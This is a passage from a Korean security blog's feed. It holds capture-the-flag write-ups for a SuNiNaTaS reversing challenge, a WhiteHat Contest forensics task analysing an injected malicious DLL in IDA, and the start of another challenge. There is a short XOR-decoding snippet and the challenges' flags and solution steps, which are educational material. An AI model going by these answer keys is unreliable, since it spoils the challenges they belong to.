&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이게 뭔가 KEY 값일거 같아서 순서대로 붙혀서 넣어봤는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;답이 아닌것 같았다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;779&quot; data-origin-height=&quot;214&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bz7GbT/btsF4XBOaU3/t5TghhKkR1Ksca3kPiGlv0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bz7GbT/btsF4XBOaU3/t5TghhKkR1Ksca3kPiGlv0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bz7GbT/btsF4XBOaU3/t5TghhKkR1Ksca3kPiGlv0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbz7GbT%2FbtsF4XBOaU3%2Ft5TghhKkR1Ksca3kPiGlv0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;779&quot; height=&quot;214&quot; data-origin-width=&quot;779&quot; data-origin-height=&quot;214&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;일단 2V 와 Authkey 부분에 F2를 눌러서&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;브레이크 포인트를 걸고 실행을 시켜보기로 했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;875&quot; data-origin-height=&quot;302&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/x2B2C/btsF4Xhvss0/KSdVTlqgFjfOabG0r6tAg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/x2B2C/btsF4Xhvss0/KSdVTlqgFjfOabG0r6tAg0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/x2B2C/btsF4Xhvss0/KSdVTlqgFjfOabG0r6tAg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fx2B2C%2FbtsF4Xhvss0%2FKSdVTlqgFjfOabG0r6tAg0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;875&quot; height=&quot;302&quot; data-origin-width=&quot;875&quot; data-origin-height=&quot;302&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행을 시키면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;브레이크포인트에서 프로그램이 멈추게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기서 그냥 F7을 쭉 눌러서 프로그램을 진행시켜 보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1897&quot; data-origin-height=&quot;818&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/biS26t/btsF3d6kLbJ/dtOAAfbTHn9rSEi6Ndeh00/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/biS26t/btsF3d6kLbJ/dtOAAfbTHn9rSEi6Ndeh00/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/biS26t/btsF3d6kLbJ/dtOAAfbTHn9rSEi6Ndeh00/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbiS26t%2FbtsF3d6kLbJ%2FdtOAAfbTHn9rSEi6Ndeh00%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1897&quot; height=&quot;818&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1897&quot; data-origin-height=&quot;818&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;어느순간에 화면 오른쪽 하단에서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;정렬된 KEY 값이 보이게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2V 부터 차례로 위로 올라가면서 적어주면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;283&quot; data-origin-height=&quot;123&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/s8nWc/btsF107Iw7G/SHa9EO3eI4IlujXQnOH1q0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/s8nWc/btsF107Iw7G/SHa9EO3eI4IlujXQnOH1q0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/s8nWc/btsF107Iw7G/SHa9EO3eI4IlujXQnOH1q0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fs8nWc%2FbtsF107Iw7G%2FSHa9EO3eI4IlujXQnOH1q0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;283&quot; height=&quot;123&quot; data-origin-width=&quot;283&quot; data-origin-height=&quot;123&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알맞은 Key 값을 입력하면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;플래그인 Authkey를 찾을 수 있게 된다.&lt;/p&gt;</description>
      <category>워게임/SuNiNaTaS</category>
      <category>CTF</category>
      <category>OllyDbg</category>
      <category>reversing</category>
      <category>리버싱</category>
      <category>사이버</category>
      <category>워게임</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/719</guid>
      <comments>https://hackingstudypad.tistory.com/719#entry719comment</comments>
      <pubDate>Tue, 26 Mar 2024 11:00:14 +0900</pubDate>
    </item>
    <item>
      <title>[2022 화이트햇 콘테스트 본선] E-4 - 포렌식 / IDA</title>
      <link>https://hackingstudypad.tistory.com/718</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;e-4.PNG&quot; data-origin-width=&quot;485&quot; data-origin-height=&quot;458&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dKoTAF/btsFQe4laVj/kvvRgeOUMNaQbQwaB9ICPK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dKoTAF/btsFQe4laVj/kvvRgeOUMNaQbQwaB9ICPK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dKoTAF/btsFQe4laVj/kvvRgeOUMNaQbQwaB9ICPK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdKoTAF%2FbtsFQe4laVj%2FkvvRgeOUMNaQbQwaB9ICPK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;485&quot; height=&quot;458&quot; data-filename=&quot;e-4.PNG&quot; data-origin-width=&quot;485&quot; data-origin-height=&quot;458&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;2022 화이트햇 콘테스트 본선에 출제되었던 문제&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;이전 E-3 문제와 이어지는 문제이다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;(&lt;a href=&quot;https://hackingstudypad.tistory.com/714&quot;&gt;https://hackingstudypad.tistory.com/716&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;)&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;E-4 문제는&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;E-2에서 식별한 악성코드가&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;Injection 하는 악성 DLL을 분석하여 플래그를 획득하는 것이 목표이다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;797&quot; data-origin-height=&quot;503&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/TTrH0/btsFQU5wzb5/GMxtCf0aMoxjTR39GW3XrK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/TTrH0/btsFQU5wzb5/GMxtCf0aMoxjTR39GW3XrK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/TTrH0/btsFQU5wzb5/GMxtCf0aMoxjTR39GW3XrK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FTTrH0%2FbtsFQU5wzb5%2FGMxtCf0aMoxjTR39GW3XrK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;797&quot; height=&quot;503&quot; data-origin-width=&quot;797&quot; data-origin-height=&quot;503&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;E-2 에서 식별한 악성코드인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;FXSSVC.dll 을 IDA로 분석하다 보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;System32 경로에 있는 splsrv64.dll 로 뭔가를 하고있는걸 볼 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;아마 이 파일이 Injection 대상일거라 생각해서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당파일을 찾아&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;역시 IDA를 이용해 분석해보았다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;497&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bTAV9t/btsFQvroPVN/ZZwzjjWaxnNO0sb0enk4f1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bTAV9t/btsFQvroPVN/ZZwzjjWaxnNO0sb0enk4f1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bTAV9t/btsFQvroPVN/ZZwzjjWaxnNO0sb0enk4f1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbTAV9t%2FbtsFQvroPVN%2FZZwzjjWaxnNO0sb0enk4f1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;574&quot; height=&quot;497&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;497&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;splsrv64.dll&lt;span&gt; 을 분석해보면&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;어떤 값을 0x18로 xor 하여 szUrlName 에 담고있는것을 확인할 수 있다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;129&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cpfcPA/btsFN3QJIaj/8MKYeuNgyIp2RHnKsWezGk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cpfcPA/btsFN3QJIaj/8MKYeuNgyIp2RHnKsWezGk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cpfcPA/btsFN3QJIaj/8MKYeuNgyIp2RHnKsWezGk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcpfcPA%2FbtsFN3QJIaj%2F8MKYeuNgyIp2RHnKsWezGk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;574&quot; height=&quot;129&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;129&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;xor 하는 대상은&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기에 보이는 HEX 값들인데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1710485033198&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a = b'cKLJT]VqkKLJYV_]6)(+7k}}yj{{pG^TY_'
out = []
for c in a:
	out.append(c ^ 0x18)
bytes(out)
    
b'{STRLENisSTRANGE.103/seearcch_FLAG'&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 값들을&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위와 같이 간단하게 다시 역으로&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;0x18 과 xor 해주면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그럼 순서가 뒤죽박죽인 플래그가 나오는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;잘 맞춰주면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 문제의 플래그는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;FLAG{STRLENisSTRANGE} 였다.&lt;/p&gt;</description>
      <category>CTF/포렌식</category>
      <category>CTF</category>
      <category>forensics</category>
      <category>IDA</category>
      <category>사이버</category>
      <category>워게임</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>포렌식</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/718</guid>
      <comments>https://hackingstudypad.tistory.com/718#entry718comment</comments>
      <pubDate>Fri, 22 Mar 2024 11:00:16 +0900</pubDate>
    </item>
    <item>
      <title>[SuNiNaTaS] Challenge10 - 리버싱 / dnSpy</title>
      <link>https://hackingstudypad.tistory.com/717</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;191&quot; data-origin-height=&quot;111&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bhf5vH/btsFMBzDAPE/BHlWQsMRzdtqJRAd8x8iV0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bhf5vH/btsFMBzDAPE/BHlWQsMRzdtqJRAd8x8iV0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bhf5vH/btsFMBzDAPE/BHlWQsMRzdtqJRAd8x8iV0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbhf5vH%2FbtsFMBzDAPE%2FBHlWQsMRzdtqJRAd8x8iV0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;191&quot; height=&quot;111&quot; data-origin-width=&quot;191&quot; data-origin-height=&quot;111&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;SuNiNaTaS 에서 제공하는 열번째 문제&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;리버싱으로 분류된 문제이다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;331&quot; data-origin-height=&quot;183&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/btmDzT/btsFM9CAL3h/12s0l2SQCpDtRLddnP3rC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/btmDzT/btsFM9CAL3h/12s0l2SQCpDtRLddnP3rC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/btmDzT/btsFM9CAL3h/12s0l2SQCpDtRLddnP3rC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbtmDzT%2FbtsFM9CAL3h%2F12s0l2SQCpDtRLddnP3rC0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;331&quot; height=&quot;183&quot; data-origin-width=&quot;331&quot; data-origin-height=&quot;183&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제페이지에 들어가면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제파일을 다운로드 받을 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;115&quot; data-origin-height=&quot;39&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dSqZfN/btsFNxiVqDJ/ARUUcQr2ppsUE7nIDkQjg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dSqZfN/btsFNxiVqDJ/ARUUcQr2ppsUE7nIDkQjg0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dSqZfN/btsFNxiVqDJ/ARUUcQr2ppsUE7nIDkQjg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdSqZfN%2FbtsFNxiVqDJ%2FARUUcQr2ppsUE7nIDkQjg0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;115&quot; height=&quot;39&quot; data-origin-width=&quot;115&quot; data-origin-height=&quot;39&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다운로드 받으면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;reversing.exe 파일을 볼 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
